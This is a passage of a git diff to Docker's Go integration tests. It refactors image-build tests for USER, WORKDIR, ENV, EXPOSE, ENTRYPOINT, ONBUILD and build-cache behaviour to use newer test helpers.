{ c.Fatalf("Maintainer %s, expected %s", res, expected) @@ -1784,15 +1284,10 @@ func (s *DockerSuite) TestBuildUser(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuilduser" expected := "dockerio" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd USER dockerio - RUN [ $(whoami) = 'dockerio' ]`, - true) - if err != nil { - c.Fatal(err) - } + RUN [ $(whoami) = 'dockerio' ]`)) res := inspectField(c, name, "Config.User") if res != expected { c.Fatalf("User %s, expected %s", res, expected) @@ -1810,7 +1305,7 @@ func (s *DockerSuite) TestBuildRelativeWorkdir(c *check.C) { expectedFinal string ) - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected1 = `C:/` expected2 = `C:/test1` expected3 = `C:/test2` @@ -1824,19 +1319,15 @@ func (s *DockerSuite) TestBuildRelativeWorkdir(c *check.C) { expectedFinal = `/test2/test3` } - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN sh -c "[ "$PWD" = "`+expected1+`" ]" WORKDIR test1 RUN sh -c "[ "$PWD" = "`+expected2+`" ]" WORKDIR /test2 RUN sh -c "[ "$PWD" = "`+expected3+`" ]" WORKDIR test3 - RUN sh -c "[ "$PWD" = "`+expected4+`" ]"`, - true) - if err != nil { - c.Fatal(err) - } + RUN sh -c "[ "$PWD" = "`+expected4+`" ]"`)) + res := inspectField(c, name, "Config.WorkingDir") if res != expectedFinal { c.Fatalf("Workdir %s, expected %s", res, expectedFinal) @@ -1847,30 +1338,23 @@ func (s *DockerSuite) TestBuildRelativeWorkdir(c *check.C) { // Windows semantics. Most path handling verifications are in unit tests func (s *DockerSuite) TestBuildWindowsWorkdirProcessing(c *check.C) { testRequires(c, DaemonIsWindows) - name := "testbuildwindowsworkdirprocessing" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, "testbuildwindowsworkdirprocessing", build.WithDockerfile(`FROM busybox WORKDIR C:\\foo WORKDIR bar RUN sh -c "[ "$PWD" = "C:/foo/bar" ]" - `, - true) - if err != nil { - c.Fatal(err) - } + `)) } // #22181 Regression test. Most paths handling verifications are in unit test. // One functional test for end-to-end func (s *DockerSuite) TestBuildWindowsAddCopyPathProcessing(c *check.C) { testRequires(c, DaemonIsWindows) - name := "testbuildwindowsaddcopypathprocessing" // TODO Windows (@jhowardmsft). Needs a follow-up PR to 22181 to // support backslash such as .\\ being equivalent to ./ and c:\\ being // equivalent to c:/. This is not currently (nor ever has been) supported // by docker on the Windows platform. - dockerfile := ` - FROM busybox + buildImageSuccessfully(c, "testbuildwindowsaddcopypathprocessing", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox # No trailing slash on COPY/ADD # Results in dir being changed to a file WORKDIR /wc1 @@ -1888,43 +1372,29 @@ func (s *DockerSuite) TestBuildWindowsAddCopyPathProcessing(c *check.C) { ADD wd2 c:/wd2/ RUN sh -c "[ $(cat c:/wd1/wd1) = 'hellowd1' ]" RUN sh -c "[ $(cat c:/wd2/wd2) = 'worldwd2' ]" - ` - ctx, err := fakeContext(dockerfile, map[string]string{ - "wc1": "hellowc1", - "wc2": "worldwc2", - "wd1": "hellowd1", - "wd2": "worldwd2", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - _, err = buildImageFromContext(name, ctx, false) - if err != nil { - c.Fatal(err) - } + `), + build.WithFile("wc1", "hellowc1"), + build.WithFile("wc2", "worldwc2"), + build.WithFile("wd1", "hellowd1"), + build.WithFile("wd2", "worldwd2"), + )) } func (s *DockerSuite) TestBuildWorkdirWithEnvVariables(c *check.C) { name := "testbuildworkdirwithenvvariables" var expected string - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = `C:\test1\test2` } else { expected = `/test1/test2` } - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox ENV DIRPATH /test1 ENV SUBDIRNAME test2 WORKDIR $DIRPATH - WORKDIR $SUBDIRNAME/$MISSING_VAR`, - true) - if err != nil { - c.Fatal(err) - } + WORKDIR $SUBDIRNAME/$MISSING_VAR`)) res := inspectField(c, name, "Config.WorkingDir") if res != expected { c.Fatalf("Workdir %s, expected %s", res, expected) @@ -1936,18 +1406,17 @@ func (s *DockerSuite) TestBuildRelativeCopy(c *check.C) { testRequires(c, NotUserNamespace) var expected string - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = `C:/test1/test2` } else { expected = `/test1/test2` } - name := "testbuildrelativecopy" - dockerfile := ` - FROM busybox + buildImageSuccessfully(c, "testbuildrelativecopy", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox WORKDIR /test1 WORKDIR test2 - RUN sh -c "[ "$PWD" = '` + expected + `' ]" + RUN sh -c "[ "$PWD" = '`+expected+`' ]" COPY foo ./ RUN sh -c "[ $(cat /test1/test2/foo) = 'hello' ]" ADD foo ./bar/baz @@ -1965,53 +1434,38 @@ func (s *DockerSuite) TestBuildRelativeCopy(c *check.C) { WORKDIR /test5/test6 COPY foo ../ RUN sh -c "[ $(cat /test5/foo) = 'hello' ]" - ` - ctx, err := fakeContext(dockerfile, map[string]string{ - "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - _, err = buildImageFromContext(name, ctx, false) - if err != nil { - c.Fatal(err) - } + `), + build.WithFile("foo", "hello"), + )) } +// FIXME(vdemeester) should be unit test func (s *DockerSuite) TestBuildBlankName(c *check.C) { name := "testbuildblankname" - _, _, stderr, err := buildImageWithStdoutStderr(name, - `FROM busybox - ENV =`, - true) - if err == nil { - c.Fatal("Build was supposed to fail but didn't") - } - if !strings.Contains(stderr, "ENV names can not be blank") { - c.Fatalf("Missing error message, got: %s", stderr) - } - - _, _, stderr, err = buildImageWithStdoutStderr(name, - `FROM busybox - LABEL =`, - true) - if err == nil { - c.Fatal("Build was supposed to fail but didn't") - } - if !strings.Contains(stderr, "LABEL names can not be blank") { - c.Fatalf("Missing error message, got: %s", stderr) + testCases := []struct { + expression string + expectedStderr string + }{ + { + expression: "ENV =", + expectedStderr: "ENV names can not be blank", + }, + { + expression: "LABEL =", + expectedStderr: "LABEL names can not be blank", + }, + { + expression: "ARG =foo", + expectedStderr: "ARG names can not be blank", + }, } - _, _, stderr, err = buildImageWithStdoutStderr(name, - `FROM busybox - ARG =foo`, - true) - if err == nil { - c.Fatal("Build was supposed to fail but didn't") - } - if !strings.Contains(stderr, "ARG names can not be blank") { - c.Fatalf("Missing error message, got: %s", stderr) + for _, tc := range testCases { + buildImage(name, build.WithDockerfile(fmt.Sprintf(`FROM busybox + %s`, tc.expression))).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: tc.expectedStderr, + }) } } @@ -2019,15 +1473,10 @@ func (s *DockerSuite) TestBuildEnv(c *check.C) { testRequires(c, DaemonIsLinux) // ENV expansion is different in Windows name := "testbuildenv" expected := "[PATH=/test:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PORT=2375]" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox ENV PATH /test:$PATH - ENV PORT 2375 - RUN [ $(env | grep PORT) = 'PORT=2375' ]`, - true) - if err != nil { - c.Fatal(err) - } + ENV PORT 2375 + RUN [ $(env | grep PORT) = 'PORT=2375' ]`)) res := inspectField(c, name, "Config.Env") if res != expected { c.Fatalf("Env %s, expected %s", res, expected) @@ -2039,14 +1488,11 @@ func (s *DockerSuite) TestBuildPATH(c *check.C) { defPath := "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" - fn := func(dockerfile string, exp string) { - _, err := buildImage("testbldpath", dockerfile, true) - c.Assert(err, check.IsNil) - + fn := func(dockerfile string, expected string) { + buildImageSuccessfully(c, "testbldpath", build.WithDockerfile(dockerfile)) res := inspectField(c, "testbldpath", "Config.Env") - - if res != exp { - c.Fatalf("Env %q, expected %q for dockerfile:%q", res, exp, dockerfile) + if res != expected { + c.Fatalf("Env %q, expected %q for dockerfile:%q", res, expected, dockerfile) } } @@ -2070,18 +1516,15 @@ func (s *DockerSuite) TestBuildContextCleanup(c *check.C) { testRequires(c, SameHostDaemon) name := "testbuildcontextcleanup" - entries, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + entries, err := ioutil.ReadDir(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "tmp")) if err != nil { c.Fatalf("failed to list contents of tmp dir: %s", err) } - _, err = buildImage(name, - `FROM `+minimalBaseImage()+` - ENTRYPOINT ["/bin/echo"]`, - true) - if err != nil { - c.Fatal(err) - } - entriesFinal, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + ENTRYPOINT ["/bin/echo"]`)) + + entriesFinal, err := ioutil.ReadDir(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "tmp")) if err != nil { c.Fatalf("failed to list contents of tmp dir: %s", err) } @@ -2095,18 +1538,17 @@ func (s *DockerSuite) TestBuildContextCleanupFailedBuild(c *check.C) { testRequires(c, SameHostDaemon) name := "testbuildcontextcleanup" - entries, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + entries, err := ioutil.ReadDir(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "tmp")) if err != nil { c.Fatalf("failed to list contents of tmp dir: %s", err) } - _, err = buildImage(name, - `FROM `+minimalBaseImage()+` - RUN /non/existing/command`, - true) - if err == nil { - c.Fatalf("expected build to fail, but it didn't") - } - entriesFinal, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + + buildImage(name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + RUN /non/existing/command`)).Assert(c, icmd.Expected{ + ExitCode: 1, + }) + + entriesFinal, err := ioutil.ReadDir(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "tmp")) if err != nil { c.Fatalf("failed to list contents of tmp dir: %s", err) } @@ -2116,17 +1558,32 @@ func (s *DockerSuite) TestBuildContextCleanupFailedBuild(c *check.C) { } +// compareDirectoryEntries compares two sets of FileInfo (usually taken from a directory) +// and returns an error if different. +func compareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error { + var ( + e1Entries = make(map[string]struct{}) + e2Entries = make(map[string]struct{}) + ) + for _, e := range e1 { + e1Entries[e.Name()] = struct{}{} + } + for _, e := range e2 { + e2Entries[e.Name()] = struct{}{} + } + if !reflect.DeepEqual(e1Entries, e2Entries) { + return fmt.Errorf("entries differ") + } + return nil +} + func (s *DockerSuite) TestBuildCmd(c *check.C) { name := "testbuildcmd" - expected := "[/bin/echo Hello World]" - _, err := buildImage(name, - `FROM `+minimalBaseImage()+` - CMD ["/bin/echo", "Hello World"]`, - true) - if err != nil { - c.Fatal(err) - } + + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + CMD ["/bin/echo", "Hello World"]`)) + res := inspectField(c, name, "Config.Cmd") if res != expected { c.Fatalf("Cmd %s, expected %s", res, expected) @@ -2137,13 +1594,10 @@ func (s *DockerSuite) TestBuildExpose(c *check.C) { testRequires(c, DaemonIsLinux) // Expose not implemented on Windows name := "testbuildexpose" expected := "map[2375/tcp:{}]" - _, err := buildImage(name, - `FROM scratch - EXPOSE 2375`, - true) - if err != nil { - c.Fatal(err) - } + + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch + EXPOSE 2375`)) + res := inspectField(c, name, "Config.ExposedPorts") if res != expected { c.Fatalf("Exposed ports %s, expected %s", res, expected) @@ -2177,10 +1631,7 @@ func (s *DockerSuite) TestBuildExposeMorePorts(c *check.C) { tmpl.Execute(buf, portList) name := "testbuildexpose" - _, err := buildImage(name, buf.String(), true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(buf.String())) // check if all the ports are saved inside Config.ExposedPorts res := inspectFieldJSON(c, name, "Config.ExposedPorts") @@ -2205,11 +1656,8 @@ func (s *DockerSuite) TestBuildExposeMorePorts(c *check.C) { func (s *DockerSuite) TestBuildExposeOrder(c *check.C) { testRequires(c, DaemonIsLinux) // Expose not implemented on Windows buildID := func(name, exposed string) string { - _, err := buildImage(name, fmt.Sprintf(`FROM scratch - EXPOSE %s`, exposed), true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`FROM scratch + EXPOSE %s`, exposed))) id := inspectField(c, name, "Id") return id } @@ -2225,13 +1673,8 @@ func (s *DockerSuite) TestBuildExposeUpperCaseProto(c *check.C) { testRequires(c, DaemonIsLinux) // Expose not implemented on Windows name := "testbuildexposeuppercaseproto" expected := "map[5678/udp:{}]" - _, err := buildImage(name, - `FROM scratch - EXPOSE 5678/UDP`, - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch + EXPOSE 5678/UDP`)) res := inspectField(c, name, "Config.ExposedPorts") if res != expected { c.Fatalf("Exposed ports %s, expected %s", res, expected) @@ -2242,13 +1685,8 @@ func (s *DockerSuite) TestBuildEmptyEntrypointInheritance(c *check.C) { name := "testbuildentrypointinheritance" name2 := "testbuildentrypointinheritance2" - _, err := buildImage(name, - `FROM busybox - ENTRYPOINT ["/bin/echo"]`, - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + ENTRYPOINT ["/bin/echo"]`)) res := inspectField(c, name, "Config.Entrypoint") expected := "[/bin/echo]" @@ -2256,34 +1694,23 @@ func (s *DockerSuite) TestBuildEmptyEntrypointInheritance(c *check.C) { c.Fatalf("Entrypoint %s, expected %s", res, expected) } - _, err = buildImage(name2, - fmt.Sprintf(`FROM %s - ENTRYPOINT []`, name), - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name2, build.WithDockerfile(fmt.Sprintf(`FROM %s + ENTRYPOINT []`, name))) res = inspectField(c, name2, "Config.Entrypoint") expected = "[]" - if res != expected { c.Fatalf("Entrypoint %s, expected %s", res, expected) } - } func (s *DockerSuite) TestBuildEmptyEntrypoint(c *check.C) { name := "testbuildentrypoint" expected := "[]" - _, err := buildImage(name, - `FROM busybox - ENTRYPOINT []`, - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + ENTRYPOINT []`)) + res := inspectField(c, name, "Config.Entrypoint") if res != expected { c.Fatalf("Entrypoint %s, expected %s", res, expected) @@ -2295,13 +1722,9 @@ func (s *DockerSuite) TestBuildEntrypoint(c *check.C) { name := "testbuildentrypoint" expected := "[/bin/echo]" - _, err := buildImage(name, - `FROM `+minimalBaseImage()+` - ENTRYPOINT ["/bin/echo"]`, - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + ENTRYPOINT ["/bin/echo"]`)) + res := inspectField(c, name, "Config.Entrypoint") if res != expected { c.Fatalf("Entrypoint %s, expected %s", res, expected) @@ -2310,282 +1733,131 @@ func (s *DockerSuite) TestBuildEntrypoint(c *check.C) { } // #6445 ensure ONBUILD triggers aren't committed to grandchildren -func (s *DockerSuite) TestBuildOnBuildLimitedInheritence(c *check.C) { - var ( - out2, out3 string - ) - { - name1 := "testonbuildtrigger1" - dockerfile1 := ` +func (s *DockerSuite) TestBuildOnBuildLimitedInheritance(c *check.C) { + buildImageSuccessfully(c, "testonbuildtrigger1", build.WithDockerfile(` FROM busybox RUN echo "GRANDPARENT" ONBUILD RUN echo "ONBUILD PARENT" - ` - ctx, err := fakeContext(dockerfile1, nil) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - out1, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", name1, ".") - if err != nil { - c.Fatalf("build failed to complete: %s, %v", out1, err) - } - } - { - name2 := "testonbuildtrigger2" - dockerfile2 := ` - FROM testonbuildtrigger1 - ` - ctx, err := fakeContext(dockerfile2, nil) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - out2, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-t", name2, ".") - if err != nil { - c.Fatalf("build failed to complete: %s, %v", out2, err) - } - } - { - name3 := "testonbuildtrigger3" - dockerfile3 := ` - FROM testonbuildtrigger2 - ` - ctx, err := fakeContext(dockerfile3, nil) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - out3, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-t", name3, ".") - if err != nil { - c.Fatalf("build failed to complete: %s, %v", out3, err) - } - - } - + `)) // ONBUILD should be run in second build. - if !strings.Contains(out2, "ONBUILD PARENT") { - c.Fatalf("ONBUILD instruction did not run in child of ONBUILD parent") - } - + buildImage("testonbuildtrigger2", build.WithDockerfile("FROM testonbuildtrigger1")).Assert(c, icmd.Expected{ + Out: "ONBUILD PARENT", + }) // ONBUILD should *not* be run in third build. - if strings.Contains(out3, "ONBUILD PARENT") { + result := buildImage("testonbuildtrigger3", build.WithDockerfile("FROM testonbuildtrigger2")) + result.Assert(c, icmd.Success) + if strings.Contains(result.Combined(), "ONBUILD PARENT") { c.Fatalf("ONBUILD instruction ran in grandchild of ONBUILD parent") } - } -func (s *DockerSuite) TestBuildWithCache(c *check.C) { +func (s *DockerSuite) TestBuildSameDockerfileWithAndWithoutCache(c *check.C) { testRequires(c, DaemonIsLinux) // Expose not implemented on Windows name := "testbuildwithcache" - id1, err := buildImage(name, - `FROM scratch - MAINTAINER dockerio - EXPOSE 5432 - ENTRYPOINT ["/bin/echo"]`, - true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImage(name, - `FROM scratch + dockerfile := `FROM scratch MAINTAINER dockerio EXPOSE 5432 - ENTRYPOINT ["/bin/echo"]`, - true) - if err != nil { - c.Fatal(err) - } + ENTRYPOINT ["/bin/echo"]` + buildImageSuccessfully(c, name, build.WithDockerfile(dockerfile)) + id1 := getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithDockerfile(dockerfile)) + id2 := getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithoutCache, build.WithDockerfile(dockerfile)) + id3 := getIDByName(c, name) if id1 != id2 { c.Fatal("The cache should have been used but hasn't.") } -} - -func (s *DockerSuite) TestBuildWithoutCache(c *check.C) { - testRequires(c, DaemonIsLinux) // Expose not implemented on Windows - name := "testbuildwithoutcache" - name2 := "testbuildwithoutcache2" - id1, err := buildImage(name, - `FROM scratch - MAINTAINER dockerio - EXPOSE 5432 - ENTRYPOINT ["/bin/echo"]`, - true) - if err != nil { - c.Fatal(err) - } - - id2, err := buildImage(name2, - `FROM scratch - MAINTAINER dockerio - EXPOSE 5432 - ENTRYPOINT ["/bin/echo"]`, - false) - if err != nil { - c.Fatal(err) - } - if id1 == id2 { + if id1 == id3 { c.Fatal("The cache should have been invalided but hasn't.") } } +// Make sure that ADD/COPY still populate the cache even if they don't use it func (s *DockerSuite) TestBuildConditionalCache(c *check.C) { name := "testbuildconditionalcache" dockerfile := ` FROM busybox ADD foo /tmp/` - ctx, err := fakeContext(dockerfile, map[string]string{ - "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "hello", + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatalf("Error building #1: %s", err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) if err := ctx.Add("foo", "bye"); err != nil { c.Fatalf("Error modifying foo: %s", err) } - id2, err := buildImageFromContext(name, ctx, false) - if err != nil { - c.Fatalf("Error building #2: %s", err) - } + // Updating a file should invalidate the cache + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) if id2 == id1 { c.Fatal("Should not have used the cache") } - id3, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatalf("Error building #3: %s", err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id3 := getIDByName(c, name) if id3 != id2 { c.Fatal("Should have used the cache") } } -func (s *DockerSuite) TestBuildAddLocalFileWithCache(c *check.C) { - // local files are not owned by the correct user - testRequires(c, NotUserNamespace) - name := "testbuildaddlocalfilewithcache" - name2 := "testbuildaddlocalfilewithcache2" - dockerfile := ` +func (s *DockerSuite) TestBuildAddMultipleLocalFileWithAndWithoutCache(c *check.C) { + name := "testbuildaddmultiplelocalfilewithcache" + baseName := name + "-base" + + cli.BuildCmd(c, baseName, build.WithDockerfile(` FROM busybox + ENTRYPOINT ["/bin/sh"] + `)) + + dockerfile := ` + FROM testbuildaddmultiplelocalfilewithcache-base MAINTAINER dockerio - ADD foo /usr/lib/bla/bar - RUN sh -c "[ $(cat /usr/lib/bla/bar) = "hello" ]"` - ctx, err := fakeContext(dockerfile, map[string]string{ + ADD foo Dockerfile /usr/lib/bla/ + RUN sh -c "[ $(cat /usr/lib/bla/foo) = "hello" ]"` + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile), fakecontext.WithFiles(map[string]string{ "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImageFromContext(name2, ctx, true) - if err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) + result2 := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) + result3 := cli.BuildCmd(c, name, build.WithoutCache, build.WithExternalBuildContext(ctx)) + id3 := getIDByName(c, name) if id1 != id2 { - c.Fatal("The cache should have been used but hasn't.") + c.Fatalf("The cache should have been used but hasn't: %s", result2.Stdout()) + } + if id1 == id3 { + c.Fatalf("The cache should have been invalided but hasn't: %s", result3.Stdout()) } } -func (s *DockerSuite) TestBuildAddMultipleLocalFileWithCache(c *check.C) { - name := "testbuildaddmultiplelocalfilewithcache" - name2 := "testbuildaddmultiplelocalfilewithcache2" - dockerfile := ` - FROM busybox - MAINTAINER dockerio - ADD foo Dockerfile /usr/lib/bla/ - RUN sh -c "[ $(cat /usr/lib/bla/foo) = "hello" ]"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImageFromContext(name2, ctx, true) - if err != nil { - c.Fatal(err) - } - if id1 != id2 { - c.Fatal("The cache should have been used but hasn't.") - } -} - -func (s *DockerSuite) TestBuildAddLocalFileWithoutCache(c *check.C) { - // local files are not owned by the correct user - testRequires(c, NotUserNamespace) - name := "testbuildaddlocalfilewithoutcache" - name2 := "testbuildaddlocalfilewithoutcache2" - dockerfile := ` - FROM busybox - MAINTAINER dockerio - ADD foo /usr/lib/bla/bar - RUN sh -c "[ $(cat /usr/lib/bla/bar) = "hello" ]"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImageFromContext(name2, ctx, false) - if err != nil { - c.Fatal(err) - } - if id1 == id2 { - c.Fatal("The cache should have been invalided but hasn't.") - } -} - -func (s *DockerSuite) TestBuildCopyDirButNotFile(c *check.C) { - name := "testbuildcopydirbutnotfile" - name2 := "testbuildcopydirbutnotfile2" - +func (s *DockerSuite) TestBuildCopyDirButNotFile(c *check.C) { + name := "testbuildcopydirbutnotfile" + name2 := "testbuildcopydirbutnotfile2" + dockerfile := ` FROM ` + minimalBaseImage() + ` COPY dir /tmp/` - ctx, err := fakeContext(dockerfile, map[string]string{ + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile), fakecontext.WithFiles(map[string]string{ "dir/foo": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) // Check that adding file with similar name doesn't mess with cache if err := ctx.Add("dir_file", "hello2"); err != nil { c.Fatal(err) } - id2, err := buildImageFromContext(name2, ctx, true) - if err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name2, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name2) if id1 != id2 { c.Fatal("The cache should have been used but wasn't") } @@ -2600,25 +1872,18 @@ func (s *DockerSuite) TestBuildAddCurrentDirWithCache(c *check.C) { FROM ` + minimalBaseImage() + ` MAINTAINER dockerio ADD . /usr/lib/bla` - ctx, err := fakeContext(dockerfile, map[string]string{ + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile), fakecontext.WithFiles(map[string]string{ "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) // Check that adding file invalidate cache of "ADD ." if err := ctx.Add("bar", "hello2"); err != nil { c.Fatal(err) } - id2, err := buildImageFromContext(name2, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name2, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name2) if id1 == id2 { c.Fatal("The cache should have been invalided but hasn't.") } @@ -2626,10 +1891,8 @@ func (s *DockerSuite) TestBuildAddCurrentDirWithCache(c *check.C) { if err := ctx.Add("foo", "hello1"); err != nil { c.Fatal(err) } - id3, err := buildImageFromContext(name3, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name3, build.WithExternalBuildContext(ctx)) + id3 := getIDByName(c, name3) if id2 == id3 { c.Fatal("The cache should have been invalided but hasn't.") } @@ -2639,101 +1902,54 @@ func (s *DockerSuite) TestBuildAddCurrentDirWithCache(c *check.C) { if err := ctx.Add("foo", "hello1"); err != nil { c.Fatal(err) } - id4, err := buildImageFromContext(name4, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name4, build.WithExternalBuildContext(ctx)) + id4 := getIDByName(c, name4) if id3 != id4 { c.Fatal("The cache should have been used but hasn't.") } } +// FIXME(vdemeester) this really seems to test the same thing as before (TestBuildAddMultipleLocalFileWithAndWithoutCache) func (s *DockerSuite) TestBuildAddCurrentDirWithoutCache(c *check.C) { name := "testbuildaddcurrentdirwithoutcache" - name2 := "testbuildaddcurrentdirwithoutcache2" dockerfile := ` FROM ` + minimalBaseImage() + ` MAINTAINER dockerio ADD . /usr/lib/bla` - ctx, err := fakeContext(dockerfile, map[string]string{ + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile), fakecontext.WithFiles(map[string]string{ "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImageFromContext(name2, ctx, false) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithoutCache, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) if id1 == id2 { c.Fatal("The cache should have been invalided but hasn't.") } } -func (s *DockerSuite) TestBuildAddRemoteFileWithCache(c *check.C) { +func (s *DockerSuite) TestBuildAddRemoteFileWithAndWithoutCache(c *check.C) { name := "testbuildaddremotefilewithcache" - server, err := fakeStorage(map[string]string{ + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{ "baz": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer server.Close() - id1, err := buildImage(name, - fmt.Sprintf(`FROM `+minimalBaseImage()+` - MAINTAINER dockerio - ADD %s/baz /usr/lib/baz/quux`, server.URL()), - true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImage(name, - fmt.Sprintf(`FROM `+minimalBaseImage()+` + dockerfile := fmt.Sprintf(`FROM `+minimalBaseImage()+` MAINTAINER dockerio - ADD %s/baz /usr/lib/baz/quux`, server.URL()), - true) - if err != nil { - c.Fatal(err) - } + ADD %s/baz /usr/lib/baz/quux`, server.URL()) + cli.BuildCmd(c, name, build.WithDockerfile(dockerfile)) + id1 := getIDByName(c, name) + cli.BuildCmd(c, name, build.WithDockerfile(dockerfile)) + id2 := getIDByName(c, name) + cli.BuildCmd(c, name, build.WithoutCache, build.WithDockerfile(dockerfile)) + id3 := getIDByName(c, name) + if id1 != id2 { c.Fatal("The cache should have been used but hasn't.") } -} - -func (s *DockerSuite) TestBuildAddRemoteFileWithoutCache(c *check.C) { - name := "testbuildaddremotefilewithoutcache" - name2 := "testbuildaddremotefilewithoutcache2" - server, err := fakeStorage(map[string]string{ - "baz": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer server.Close() - - id1, err := buildImage(name, - fmt.Sprintf(`FROM `+minimalBaseImage()+` - MAINTAINER dockerio - ADD %s/baz /usr/lib/baz/quux`, server.URL()), - true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImage(name2, - fmt.Sprintf(`FROM `+minimalBaseImage()+` - MAINTAINER dockerio - ADD %s/baz /usr/lib/baz/quux`, server.URL()), - false) - if err != nil { - c.Fatal(err) - } - if id1 == id2 { + if id1 == id3 { c.Fatal("The cache should have been invalided but hasn't.") } } @@ -2744,29 